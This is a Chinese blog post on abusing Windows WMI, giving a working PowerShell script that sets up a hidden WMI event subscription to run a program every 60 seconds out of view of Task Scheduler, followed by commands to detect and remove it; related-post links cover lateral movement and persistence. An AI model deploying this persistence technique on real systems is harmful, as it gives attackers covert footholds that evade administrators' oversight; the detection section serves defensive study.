WMI利用专题

最新推荐文章于 2023-12-21 14:55:23 发布
最新推荐文章于 2023-12-21 14:55:23 发布
阅读量166 收藏 1
点赞数
文章标签: 操作系统
原文链接:http://blog.51cto.com/antivirusjo/2092545
版权

WMI 的***,防御与取证分析技术之***篇:
http://drops.xmd5.com/static/drops/tips-9973.html
WMI 的***,防御与取证分析技术之防御篇
http://drops.xmd5.com/static/drops/tips-10346.html
wp-windows-management-instrumentation.pdf:
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
WMI backdoor:
http://bobao.360.cn/learning/detail/628.html
如何在系统日志中记录WMI Persistence:
http://www.4hou.com/technology/1860.html

(1)打开wmi服务
WMI利用专题
启动服务
WMI利用专题

win+R 输入 wmic
WMI利用专题

(2)编写一个powershell脚本,使用wmi隐藏一个定时任务
脚本内容如下:

$filterName = 'BotFilter82'
$consumerName = 'BotConsumer23'
$exePath = 'C:\Windows\System32\notepad.exe'
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE
TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=
$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ExecutablePath=$exePath;CommandLineTemplate=$exePath}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=
$WMIEventFilter;Consumer=$WMIEventConsumer}

WMI利用专题

打开powershell
WMI利用专题

启动管理员权限:
Start-Process powershell -Verb runAs

WMI利用专题

打开执行脚本权限:
set-ExecutionPolicy RemoteSigned

WMI利用专题

运行结果:
WMI利用专题

进程监控结果:
WMI利用专题

脚本功能:
每60s执行一次notepad.exe

查看计划任务没有这个,达到隐藏效果:
WMI利用专题

0x04 WMI后门检测及清除 :

1、查看当前WMI Event

【管理员权限】

#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter

#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding

WMI利用专题

2、清除后门

#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose

#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose

#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose

WMI利用专题

歇会。。。。。。。。。。。。更新中

转载于:https://blog.51cto.com/antivirusjo/2092545

weixin_34177064
关注
WMI问题答案集锦
Cmoremore的程序大宅门
09-03 3441
WMI使用技巧集 很多的朋友对WMI可能见过但理解不深,我也是十分想了解关于WMI的知识,可一直找不对太合适的资料,在网上的一些资料不是有很多错误,就是讲解不清,我有空的时候将关于WMI的知识集中一下,放在这里便于大家学习。本贴会不断增加。1、 什么是WMIWMI是英文Windows Management Instrumentation的简写,它的功能主要是:访问本地主机的一些信息
WMI利用(横向移动)
Ping_Pig的博客
11-09 1811
WMI利用(横向移动) 讲在前面:     上一篇文章我们简单的解释了什么是WMIWMI做什么,为什么使用WMI。本文是笔者在阅读国内部分的解释WMI横向移动的文章后写下的一篇文章,希望帮助同学们在攻防中进入横向移动后根据实际场景利用WMI来解决问题。在横向移动中的固定过程中一定离不开“信息收集”,然后分析信息根据实际场景(工作组或者域)来进行横向移动,至于使用什么工具,为什么使用这个工具,笔者使用WMI的意见。所以本文分为三个段落,信息收集、横向移动、部分意见。
WMI利用(权限维持)
Ping_Pig的博客
11-09 1140
讲在前面:     在简单了解了WMI后,我们开始了横向移动,包括其中的信息收集,工具利用。那么在我们短暂的获取权限后,如何才能将权限持久化,也就是所说的权限维持住呢?笔者看了国内外部分文章后,发现WMI做权限维持主要是介绍WMI事件,并将其分为永久事件和临时事件,本文参考部分博客文章对WMI事件进行讲解,不足之处,望及时指出。 什么是WMI事件     WMI事件,即特定对象的属性发生改变时发出的通知,其中包括增加、修改、删除
Windows渗透测试中wmi利用
weixin_30784501的博客
04-06 297
0x01 关于WMI WMI可以描述为一组管理Windows系统的方法和功能。我们可以把它当作API来与Windows系统进行相互交流。WMI在渗透测试中的价值在于它不需要下载和安装, 因为WMI是Windows系统自带功能。而且整个运行过程都在计算机内存中发生,不会留下任何痕迹。这一点是其它渗透测试工具所不能相比的。 0x02 WMI信息收集 1.检索系统已安装的软件 ...
WMI 订阅利用之分析总结
A_991128a的博客
08-12 117
本文对 WMI 的一些利用手法进行了总结,其中主要对 WMI 事件订阅的利用做了详细的剖析,希望可以对大家的学习提供一些帮助。WMI(Windows Management Instrumentation,Windows 管理规范)是一项核心的 Windows 管理技术。用户可以通过WMI 管理本地和远程计算机。Windows 为远程传输 WMI 数据提供了两个可用的协议,即分布式组件对象模型(Distributed Component。
专题资料(2021-2022年)Windows进程管理工具设计与实现.doc
10-08
- 在设计和实现自定义的进程管理工具时,开发者通常需要利用 Windows API 来获取和操作系统的交互,如获取进程列表、结束进程、管理线程等。 - VC++(Visual C++)是 Microsoft 提供的用于开发 Windows 应用程序的...
专题资料(2021-2022年)SolarWinds 网络管理软件产品.docx
10-07
Engineer’s Toolset是一套集成的网络管理工具,利用Workspace Studio提升诊断效率: - **Workspace Studio**:定制化工作环境,减少诊断时间。 - **Real-Time Interface Monitor** 和 **SNMP Real-Time Graph**...
专题资料(2021-2022年)RGSMP2X桌面管理审计组件产品特性技术白皮书.doc
10-07
锐捷网络的RGSMP2.X桌面管理/审计组件是一款专为IT运维设计的平台型软件系统,它结合了WMI(Windows Management Instrumentation)、MBSA(Microsoft Baseline Security Analyzer)、SPI(System Policy Responder)...
53.远控免杀专题(53)-白名单WMIC.exe执行payload1
08-03
远控免杀专题(53)-白名单WMIC.exe执行payload1】 在网络安全领域,免杀技术是攻击者为了绕过反病毒软件的检测而采取的一种策略。本文将详细介绍如何利用白名单程序WMIC.exe来执行payload,从而实现远程控制的免杀...
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
最新发布
aming小老弟
12-21 1298
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
WMI_Backdoor:在Black Hat 2015上展示的PoC WMI后门
05-16
WMI_Backdoor 在Black Hat 2015上展示的PoC WMI后门
Windows安全基础——Windows WMI详解
Liu_Bruce的博客
12-11 4214
WMI(Windows Management Instrumentation, Windows管理规范)是Windows 2000/XP管理系统的核心,属于管理数据和操作的基础模块。设计WMI的初衷是达到一种通用性,通过WMI操作系统、应用程序等来管理本地或者远程资源。它支持分布式组件对象模型(DCOM,Distribution Components Object Model)和Windows远程管理(WinRM),用户可通过WMI服务访问、配置、管理和监视Windows所有资源的功能。对于其他的Win32
WMI的使用
weixin_45007073的博客
08-01 2919
WMI介绍基本命令 介绍 WMI的全名为"Windows Management Instrumentation"。从win8后,Windows操作系统都支持WMIWMI可以在本地或者远程管理计算机系统。 自从PsExec在内网中被严格监控后,越来越多的反病毒厂商将PsExec加入了黑名单,于是乎攻击者转向使用WMI进行横向移动。在渗透时发现,在使用wmiexec进行横向移动时,Windows操作系统默认不会将WMI的操作记录在日志中。因为这个过程不会记录日志,所以对蓝队来说大大增加了溯源的成本。对攻击者来
WMI实现Windows系统自动管理
Tech is Online(物联网技术传播)
11-09 2682
  与以前的操作系统相比,Windows 2K/XP的优点之一是具有更好的可管理性。例如它支持Windows 2000服务器终端服务下的远程管理模式,支持Microsoft管理控制台(MMC),再有一个就是支持WMIWMI是Windows Management Instrumentation的缩写,即Windows管理规范。WMI有许多用途,其中之一就是通过脚本编程实现管理自动化。  一、为
WMI技术介绍和应用——总结(完)
热门推荐
方亮的专栏
02-08 1万+
WMI开发过程的一个总结
Windows定时脚本
bulelemon的博客
11-10 3891
一般情况下,代码都是搭建在linux服务器上,linux建定时脚本还是比较简单的,使用 crontab -e 添加记录就好,但最近遇到了需要在windows机器上搭一个自动化系统的情况,而且执行的命令是比较耗时的,直接用php调,会导致页面一直等待结果,会卡住;这里可以使用定时脚本定时去跑,就可以解决这个问题了; 具体实现方式: 1、新建一个bat的文件,里面执行对应的php或者需要的脚本命令
内网横向移动常用方法总结
da_chuan_chuan的博客
04-27 4326
文章目录前言一、通过at&schtasks进行明文传递二、、atexec进行明文与HASH传递三、SMB 服务利用1、psexec工具传递2、smbexec工具传递四、WMI 服务利用1、wmic传递2、cscript传递3、wmiexec传递五、PTH横向传递攻击六、PTK横向传递攻击二、使用步骤1.引入库2.读入数据总结 前言 当我们拿下webshell后,若其服务器有内网环境,在进一步测试中就需要进行内网渗透测试,对于内网渗透测试的方法常用的为:基于口令的横向移动和基于漏洞的攻击。本文主要从基
VB编程利用WMI管理Windows系统详解
微软为了简化这一过程,在Windows 2000及后续版本中引入了Windows Management Instrumentation (WMI),这是一种强大的管理工具,用于系统资源的访问、配置和监控。WMI使得VB程序员能够以更直观、面向对象的方式编写...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值